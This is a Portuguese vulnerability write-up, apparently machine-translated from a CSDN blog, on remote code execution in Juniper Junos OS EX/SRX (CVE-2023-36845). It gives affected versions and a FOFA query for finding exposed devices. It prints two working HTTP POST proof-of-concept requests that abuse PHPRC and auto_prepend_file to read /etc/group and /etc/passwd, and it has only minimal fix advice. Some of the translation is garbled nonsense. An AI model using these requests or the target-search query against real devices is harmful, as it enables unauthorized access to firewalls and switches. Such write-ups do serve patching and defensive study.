Vulnerabilidade de execução remota de comando Juniper Networks Junos OS EX (CVE-2023-36845)

Isenção de responsabilidade: Por favor, não use as tecnologias relevantes neste artigo para realizar testes ilegais. Quaisquer consequências e perdas diretas ou indiretas causadas pela disseminação e uso das informações ou ferramentas fornecidas neste artigo serão de responsabilidade do próprio usuário. Todos consequências incorridas As consequências adversas não têm nada a ver com o autor do artigo. Este artigo é apenas para fins educacionais.

1: Descrição da vulnerabilidade

Juniper Networks Junos OS EX é um sistema operacional de rede da empresa americana Juniper Networks dedicado aos equipamentos de hardware da empresa. Ele contém uma vulnerabilidade de manipulação de variável de ambiente PHP que afeta firewalls Juniper SRX e switches EX. Um invasor pode executar comandos remotos sem autorização.

2: Versões afetadas pela vulnerabilidade

versão atual < 21.4R3-S5
22.1versão < 22.1R3-S4
22.2versão < 22.2R3-S2
22.3versão < 22.3R2-S2、22.3R3-S1
22.4versão < 22.4R2-S1、22.4R3
23.2versão < 23.2R1-S1、23.2R2

Três: levantamento do ciberespaço e consulta de mapeamento

fofa:title=“Juniper Web Device Manager”

Insira a descrição da imagem aqui

4. Recorrência de vulnerabilidades

1. Reprodução manual

POC1 recorrente

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9


auto_prepend_file="/etc/group"

captura de tela do burpsuite
Insira a descrição da imagem aqui
POC2 reproduzido

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9


auto_prepend_file="/etc/passwd"

captura de tela do burpsuite

Insira a descrição da imagem aqui

2. Recorrência automatizada

Ferramenta de detecção Xiaolong POC por um tempo

Insira a descrição da imagem aqui
Outro tocante pedaço de vermelho azuki

7. Sugestões de reparo

Versão atualizada
Bloquear execução de código confidencial

Acho que você gosta

Origin blog.csdn.net/holyxp/article/details/133741502
Recomendado
Clasificación